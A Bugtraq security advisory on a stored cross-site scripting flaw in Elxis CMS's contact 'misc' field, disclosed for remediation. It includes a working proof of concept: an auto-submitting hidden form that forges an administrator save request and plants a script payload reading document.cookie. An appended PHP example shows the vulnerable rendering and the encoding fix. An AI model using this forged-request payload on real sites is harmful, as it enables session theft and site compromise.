Bugtraq mailing list archives

XSS vulnerability in Elxis CMS (contacts)


From: advisory () htbridge ch
Date: Tue, 5 Oct 2010 14:26:49 +0200 (CEST)

Vulnerability ID: HTB22615
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html
Product: Elxis CMS
Vendor: Elxis Team ( http://www.elxis.org/ ) 
Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
Vendor Notification: 20 September 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
An attacker can execute arbitrary JavaScript in the browser of any user who views the affected content of the vulnerable application.

The vulnerability exists because the "administrator/index2.php" script fails to properly sanitize user-supplied 
input in the "misc" parameter of a contact record (option=com_contact, task=save) before it is stored and later rendered. 
The PoC payload opens with `">`, i.e. it is written to break out of an HTML attribute value into which the field is echoed. 
Successful exploitation could result in a compromise of the application, theft of cookie-based authentication 
credentials, and disclosure or modification of sensitive data.

The vulnerability can be exploited with an ordinary web browser. Since index2.php is part of the administrator back end, 
the save request is expected to be issued by a browser holding a valid administrator session; the PoC below is an 
auto-submitting HTML form that an attacker would host and lure a logged-in administrator into loading. The following PoC is available:

<form action="http://eecore/elxis/administrator/index2.php" method="post" name="main" >
<input type="hidden" name="catid" value="1" />
<input type="hidden" name="user_id" value="0" />
<input type="hidden" name="name" value="My Name" />
<input type="hidden" name="seotitle" value="sef-url" />
<input type="hidden" name="con_position" value="Website manager" />
<input type="hidden" name="email_to" value="webmaster@example.com" />
<input type="hidden" name="address" value="My address" />
<input type="hidden" name="suburb" value="city" />
<input type="hidden" name="state" value="reg" />
<input type="hidden" name="country" value="country" />
<input type="hidden" name="postcode" value="12345" />
<input type="hidden" name="telephone" value="123" />
<input type="hidden" name="fax" value="123" />
<!-- the stored XSS payload: the leading " closes the attribute the field is echoed into, > closes the tag -->
<input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' />
<input type="hidden" name="default_con" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="access" value="29" />
<input type="hidden" name="image" value="asterisk.png" />
<input type="hidden" name="params[menu_image]" value="-1" />
<input type="hidden" name="params[menu_image_only]" value="0" />
<input type="hidden" name="params[pageclass_sfx]" value="" />
<input type="hidden" name="params[print]" value="" />
<input type="hidden" name="params[back_button]" value="" />
<input type="hidden" name="params[name]" value="1" />
<input type="hidden" name="params[position]" value="1" />
<input type="hidden" name="params[email]" value="0" />
<input type="hidden" name="params[street_address]" value="1" />
<input type="hidden" name="params[suburb]" value="1" />
<input type="hidden" name="params[state]" value="1" />
<input type="hidden" name="params[country]" value="1" />
<input type="hidden" name="params[postcode]" value="1" />
<input type="hidden" name="params[telephone]" value="1" />
<input type="hidden" name="params[fax]" value="1" />
<input type="hidden" name="params[misc]" value="1" />
<input type="hidden" name="params[vcard]" value="1" />
<input type="hidden" name="params[image]" value="1" />
<input type="hidden" name="params[email_description]" value="1" />
<input type="hidden" name="params[email_description_text]" value="" />
<input type="hidden" name="params[email_form]" value="1" />
<input type="hidden" name="params[email_copy]" value="1" />
<input type="hidden" name="params[drop_down]" value="0" />
<input type="hidden" name="params[contact_icons]" value="1" />
<input type="hidden" name="params[icon_address]" value="" />
<input type="hidden" name="params[icon_email]" value="" />
<input type="hidden" name="params[icon_telephone]" value="" />
<input type="hidden" name="params[icon_fax]" value="" />
<input type="hidden" name="params[icon_misc]" value="" />
<input type="hidden" name="option" value="com_contact" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="task" value="save" />
</form>
<script>
// auto-submit on page load; the victim's browser attaches whatever session cookie it holds for the target
document.main.submit();
</script>
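To make the bug class concrete, the following is an added illustration, not Elxis source and not part of the original advisory: a minimal PHP model (Elxis is written in PHP) of the rendering pattern the PoC payload is built to break out of, next to the usual fix. The render_vulnerable/render_fixed/html_attr functions and the surrounding markup are assumptions made for the illustration; only the payload string is taken from the PoC above.

```php
<?php
// Illustrative only: NOT Elxis CMS code. Models a stored field echoed into an
// HTML attribute without encoding, and the standard fix, using the advisory's
// own "misc" payload as input. Run with: php xss_misc_example.php

// The "misc" value the PoC stores via administrator/index2.php (task=save).
const PAYLOAD = 'hello"><script>alert(document.cookie)</script>';

// Vulnerable pattern (assumed for illustration): the stored field is
// interpolated straight into a double-quoted attribute value. The payload's
// leading `"` closes the attribute, `>` closes the tag, and the <script>
// element that follows is parsed as markup.
function render_vulnerable(string $misc): string
{
    return '<input type="text" name="misc" value="' . $misc . '" />';
}

// Fix: HTML-encode for the attribute context. ENT_QUOTES encodes both " and ',
// so the value is safe in single- or double-quoted attributes (PHP's default
// before 8.1 left ' unencoded); ENT_SUBSTITUTE replaces invalid UTF-8 instead
// of returning an empty string, which would silently drop the field.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_fixed(string $misc): string
{
    return '<input type="text" name="misc" value="' . html_attr($misc) . '" />';
}

// Crude check used only to show the difference between the two outputs:
// does a literal <script start tag survive into the generated HTML?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vuln  = render_vulnerable(PAYLOAD);
$fixed = render_fixed(PAYLOAD);

echo "vulnerable: $vuln\n";
echo "fixed:      $fixed\n";

$ok = contains_script_tag($vuln) === true
   && contains_script_tag($fixed) === false
   // Encoding is lossless: decoding the attribute value gives the stored data back.
   && html_entity_decode(html_attr(PAYLOAD), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') === PAYLOAD;

if (!$ok) {
    fwrite(STDERR, "self-check failed\n");
    exit(1);
}
echo "self-check passed\n";
```

The point of the check at the end is that output encoding, not input filtering, is the fix: the same stored value is kept byte-for-byte and only its rendering changes, so a stored record that already contains the payload becomes harmless once the template encodes it.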

Solution: Upgrade to the most recent version; the vendor has fixed the issue (see Status above).

